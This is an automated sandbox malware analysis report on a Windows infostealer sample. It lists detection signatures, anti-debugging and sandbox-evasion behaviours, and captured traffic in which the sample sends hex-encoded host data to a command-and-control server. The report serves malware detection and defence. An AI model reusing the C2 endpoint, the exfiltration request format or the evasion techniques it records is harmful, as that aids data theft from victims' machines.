Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lolvgcpX19.exe

Overview

General Information

Sample name:lolvgcpX19.exe
renamed because original name is a hash value
Original sample name:605f4d4c3e2be9f71fe0974b6ce3c714.exe
Analysis ID:1581218
MD5:605f4d4c3e2be9f71fe0974b6ce3c714
SHA1:b361107308ff54acebd2221648551ea4ea60d679
SHA256:f455531a6a17ac4c13070b4dc22758990ec5c31dfb80f4a4f914745f66da3d2f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • lolvgcpX19.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\lolvgcpX19.exe" MD5: 605F4D4C3E2BE9F71FE0974B6CE3C714)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: lolvgcpX19.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: lolvgcpX19.exeVirustotal: Detection: 42%Perma Link
Source: lolvgcpX19.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: lolvgcpX19.exeJoe Sandbox ML: detected
Source: lolvgcpX19.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00FEA5B0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEB560
Source: lolvgcpX19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500650Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 35 39 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104A8C0 recvfrom,0_2_0104A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500650Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 35 39 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:46:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:46:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: lolvgcpX19.exe, 00000000.00000002.2311257841.0000000000664000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295164881.0000000000664000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294250532.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: lolvgcpX19.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

System Summary

barindex
PE file contains section with special chars
Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: .idata
Source: lolvgcpX19.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BEB180_3_006BEB18
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F905B00_2_00F905B0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F96FA00_2_00F96FA0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104B1800_2_0104B180
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FBF1000_2_00FBF100
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0130A0000_2_0130A000
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0130E0500_2_0130E050
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_010500E00_2_010500E0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104C3200_2_0104C320
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FE62100_2_00FE6210
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_010504200_2_01050420
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012D44100_2_012D4410
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012E67300_2_012E6730
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104C7700_2_0104C770
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_013047800_2_01304780
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8E6200_2_00F8E620
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FEA7F00_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0103C9000_2_0103C900
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8A9600_2_00F8A960
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F949400_2_00F94940
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0123AB2C0_2_0123AB2C
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01114B600_2_01114B60
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012F8BF00_2_012F8BF0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8CBB00_2_00F8CBB0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01156AC00_2_01156AC0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0123AAC00_2_0123AAC0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01304D400_2_01304D40
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012FCD800_2_012FCD80
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0130CC900_2_0130CC90
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104EF900_2_0104EF90
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01048F900_2_01048F90
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012D2F900_2_012D2F90
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0129AE300_2_0129AE30
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FA4F700_2_00FA4F70
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F910E60_2_00F910E6
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012F35B00_2_012F35B0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012ED4300_2_012ED430
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_013117A00_2_013117A0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012D56D00_2_012D56D0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_012D99200_2_012D9920
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_010398800_2_01039880
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F875A0 appears 600 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC4FD0 appears 223 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F873F0 appears 102 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC5340 appears 41 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC4F40 appears 295 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 01137220 appears 90 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F871E0 appears 43 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F8CAA0 appears 62 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 010644A0 appears 64 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 0115CBC0 appears 94 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC50A0 appears 86 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F9CD40 appears 63 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F9CCD0 appears 53 times
Source: lolvgcpX19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: lolvgcpX19.exeStatic PE information: Section: ywbalksd ZLIB complexity 0.994453125
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: C:\Users\user\Desktop\lolvgcpX19.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\lolvgcpX19.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: lolvgcpX19.exeVirustotal: Detection: 42%
Source: lolvgcpX19.exeReversingLabs: Detection: 44%
Source: lolvgcpX19.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: lolvgcpX19.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: iphlpapi.dllJump to behavior
